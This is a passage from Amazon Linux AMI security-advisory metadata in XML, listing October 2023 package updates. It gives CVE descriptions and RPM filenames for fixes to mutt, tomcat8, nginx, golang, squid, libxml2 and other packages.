</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40433" title="" id="CVE-2022-40433" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.382.b05-1.79.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.382.b05-1.79.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.382.b05" release="1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.382.b05-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1865</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1865: medium priority package update for mutt</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-1328:
A flaw was found in mutt. When reading unencoded messages, mutt uses the line length from the untrusted input without any validation. This flaw allows an attacker to craft a malicious message, which leads to an out-of-bounds read, causing data leaks that include fragments of other unrelated messages.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1328" title="" id="CVE-2022-1328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.11.amzn1.x86_64.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="x86_64"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.11.amzn1.x86_64.rpm</filename></package><package name="mutt-debuginfo" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-debuginfo-1.5.20-7.20091214hg736b6a.11.amzn1.i686.rpm</filename></package><package name="mutt" version="1.5.20" release="7.20091214hg736b6a.11.amzn1" epoch="5" arch="i686"><filename>Packages/mutt-1.5.20-7.20091214hg736b6a.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1866</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1866: important priority package update for amazon-ssm-agent</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-30 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24540:
html/template: improper handling of JavaScript whitespace.
Not all valid JavaScript whitespace characters were considered to be whitespace. Templates containing whitespace characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.
CVE-2023-24538:
Templates did not properly consider backticks (`) as Javascript string delimiters, and as such did
not escape them as expected. Backticks are used, since ES6, for JS template literals. If a template
contained a Go template action within a Javascript template literal, the contents of the action could
be used to terminate the literal, injecting arbitrary Javascript code into the Go template.
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
CVE-2021-43565:
The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43565" title="" id="CVE-2021-43565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24538" title="" id="CVE-2023-24538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24540" title="" id="CVE-2023-24540" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent-debuginfo" version="3.2.1705.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.1705.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent" version="3.2.1705.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.1705.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1867</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1867: medium priority package update for ghostscript</title><issued date="2023-10-12 15:48:00" /><updated date="2023-10-24 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16294:
A buffer overflow vulnerability in epsc_print_page() in devices/gdevepsc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16294" title="" id="CVE-2020-16294" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.33.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.33.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.33.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1868</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1868: important priority package update for tomcat8</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45648:
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVE-2023-42795:
Incomplete Cleanup vulnerability in Apache Tomcat. When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42795" title="" id="CVE-2023-42795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45648" title="" id="CVE-2023-45648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-lib" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.94-1.95.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.94" release="1.95.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.94-1.95.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1869</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1869: important priority package update for nghttp2</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.8.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.8.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1870</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1870: important priority package update for nginx</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-all-modules" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.45.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.18.0-1.45.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.18.0" release="1.45.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.18.0-1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1871</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1871: important priority package update for golang</title><issued date="2023-10-16 13:45:00" /><updated date="2023-10-18 20:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-44487:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVE-2023-39325:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVE-2023-39323:
Line directives ("//line") can be used to bypass the restrictions on "//go:cgo_" directives, allowing blocked linker and compiler flags to be passed during compilation. This can result in unexpected execution of arbitrary code when running "go build". The line directive requires the absolute path of the file in which the directive lives, which makes exploiting this issue significantly more complex.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39323" title="" id="CVE-2023-39323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39325" title="" id="CVE-2023-39325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487" title="" id="CVE-2023-44487" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-shared" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.20.10" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.20.10-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.20.10" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.20.10-1.48.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.20.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.20.10-1.48.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.20.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.20.10-1.48.amzn1.i686.rpm</filename></package><package name="golang" version="1.20.10" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.20.10-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1872</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1872: critical priority package update for squid</title><issued date="2023-10-25 21:15:00" /><updated date="2023-11-06 21:16:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46847:
Due to a buffer overflow bug Squid is vulnerable to a Denial of Service attack against HTTP Digest Authentication
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46847" title="" id="CVE-2023-46847" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.50.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.50.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.50.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.50.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.50.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1873</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1873: low priority package update for shadow-utils</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4641:
A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4641" title="" id="CVE-2023-4641" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="shadow-utils" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/shadow-utils-4.1.4.2-13.11.amzn1.x86_64.rpm</filename></package><package name="shadow-utils-debuginfo" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="x86_64"><filename>Packages/shadow-utils-debuginfo-4.1.4.2-13.11.amzn1.x86_64.rpm</filename></package><package name="shadow-utils" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="i686"><filename>Packages/shadow-utils-4.1.4.2-13.11.amzn1.i686.rpm</filename></package><package name="shadow-utils-debuginfo" version="4.1.4.2" release="13.11.amzn1" epoch="2" arch="i686"><filename>Packages/shadow-utils-debuginfo-4.1.4.2-13.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1874</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1874: important priority package update for libxml2</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-45322:
libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is "I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail."
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45322" title="" id="CVE-2023-45322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.44.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.44.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.44.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1875</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1875: medium priority package update for libXpm</title><issued date="2023-10-30 23:31:00" /><updated date="2023-11-03 17:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-43789:
libXpm: out of bounds read on XPM with corrupted colormap
CVE-2023-43787:
libX11: integer overflow in XCreateImage() leading to a heap overflow.
CVE-2023-43786:
A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.
